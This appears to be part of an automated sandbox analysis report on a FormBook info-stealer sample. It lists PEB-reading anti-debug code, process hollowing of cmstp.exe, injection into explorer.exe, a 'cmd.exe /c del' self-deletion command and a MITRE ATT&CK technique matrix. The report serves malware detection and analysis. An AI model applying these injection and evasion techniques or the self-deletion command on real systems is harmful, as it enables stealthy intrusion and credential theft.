          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A68DF1 mov eax, dword ptr fs:[00000030h]1_2_00A68DF1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A3A537 mov eax, dword ptr fs:[00000030h]1_2_00A3A537
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88D34 mov eax, dword ptr fs:[00000030h]1_2_00A88D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7E539 mov eax, dword ptr fs:[00000030h]1_2_00A7E539
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAD30 mov eax, dword ptr fs:[00000030h]1_2_009BAD30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D7D50 mov eax, dword ptr fs:[00000030h]1_2_009D7D50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F3D43 mov eax, dword ptr fs:[00000030h]1_2_009F3D43
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33540 mov eax, dword ptr fs:[00000030h]1_2_00A33540
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]1_2_009DC577
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]1_2_009DC577
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A346A7 mov eax, dword ptr fs:[00000030h]1_2_00A346A7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FE87 mov eax, dword ptr fs:[00000030h]1_2_00A4FE87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E36CC mov eax, dword ptr fs:[00000030h]1_2_009E36CC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F8EC7 mov eax, dword ptr fs:[00000030h]1_2_009F8EC7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A6FEC0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E16E0 mov ecx, dword ptr fs:[00000030h]1_2_009E16E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88ED6 mov eax, dword ptr fs:[00000030h]1_2_00A88ED6
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C76E2 mov eax, dword ptr fs:[00000030h]1_2_009C76E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]1_2_009EA61C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]1_2_009EA61C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FE3F mov eax, dword ptr fs:[00000030h]1_2_00A6FE3F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E8E00 mov eax, dword ptr fs:[00000030h]1_2_009E8E00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71608 mov eax, dword ptr fs:[00000030h]1_2_00A71608
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BE620 mov eax, dword ptr fs:[00000030h]1_2_009BE620
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]1_2_00A7AE44
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]1_2_00A7AE44
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C766D mov eax, dword ptr fs:[00000030h]1_2_009C766D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8794 mov eax, dword ptr fs:[00000030h]1_2_009C8794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F37F5 mov eax, dword ptr fs:[00000030h]1_2_009F37F5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DF716 mov eax, dword ptr fs:[00000030h]1_2_009DF716
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]1_2_009EA70E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]1_2_009EA70E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]1_2_00A8070D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]1_2_00A8070D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EE730 mov eax, dword ptr fs:[00000030h]1_2_009EE730
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]1_2_00A4FF10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]1_2_00A4FF10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]1_2_009B4F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]1_2_009B4F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88F6A mov eax, dword ptr fs:[00000030h]1_2_00A88F6A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CEF40 mov eax, dword ptr fs:[00000030h]1_2_009CEF40
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CFF60 mov eax, dword ptr fs:[00000030h]1_2_009CFF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]11_2_0467FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]11_2_0467FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465766D mov eax, dword ptr fs:[00000030h]11_2_0465766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]11_2_046FB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]11_2_046FB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468927A mov eax, dword ptr fs:[00000030h]11_2_0468927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718A62 mov eax, dword ptr fs:[00000030h]11_2_04718A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470EA55 mov eax, dword ptr fs:[00000030h]11_2_0470EA55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]11_2_0470AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]11_2_0470AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D4257 mov eax, dword ptr fs:[00000030h]11_2_046D4257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464E620 mov eax, dword ptr fs:[00000030h]11_2_0464E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]11_2_04684A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]11_2_04684A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFE3F mov eax, dword ptr fs:[00000030h]11_2_046FFE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04678E00 mov eax, dword ptr fs:[00000030h]11_2_04678E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04658A0A mov eax, dword ptr fs:[00000030h]11_2_04658A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]11_2_0464AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]11_2_0464AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov ecx, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701608 mov eax, dword ptr fs:[00000030h]11_2_04701608
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04663A1C mov eax, dword ptr fs:[00000030h]11_2_04663A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]11_2_0467A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]11_2_0467A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672AE4 mov eax, dword ptr fs:[00000030h]11_2_04672AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046716E0 mov ecx, dword ptr fs:[00000030h]11_2_046716E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046576E2 mov eax, dword ptr fs:[00000030h]11_2_046576E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718ED6 mov eax, dword ptr fs:[00000030h]11_2_04718ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046736CC mov eax, dword ptr fs:[00000030h]11_2_046736CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672ACB mov eax, dword ptr fs:[00000030h]11_2_04672ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFEC0 mov eax, dword ptr fs:[00000030h]11_2_046FFEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04688EC7 mov eax, dword ptr fs:[00000030h]11_2_04688EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C46A7 mov eax, dword ptr fs:[00000030h]11_2_046C46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]11_2_0465AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]11_2_0465AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FAB0 mov eax, dword ptr fs:[00000030h]11_2_0467FAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DFE87 mov eax, dword ptr fs:[00000030h]11_2_046DFE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]11_2_0467D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]11_2_0467D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB60 mov ecx, dword ptr fs:[00000030h]11_2_0464DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465FF60 mov eax, dword ptr fs:[00000030h]11_2_0465FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718F6A mov eax, dword ptr fs:[00000030h]11_2_04718F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]11_2_04673B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]11_2_04673B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB40 mov eax, dword ptr fs:[00000030h]11_2_0464DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465EF40 mov eax, dword ptr fs:[00000030h]11_2_0465EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718B58 mov eax, dword ptr fs:[00000030h]11_2_04718B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F358 mov eax, dword ptr fs:[00000030h]11_2_0464F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]11_2_04644F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]11_2_04644F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 1_2_00409B50 LdrLoadDll,1_2_00409B50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_100057F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100057F4

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Memory written: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3440
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Process created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_10004343 cpuid 0_2_10004343
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_1000568B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_1000568B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Application Shimming 1 | Process Injection 612 | Virtualization/Sandbox Evasion 2 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Process Injection 612 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
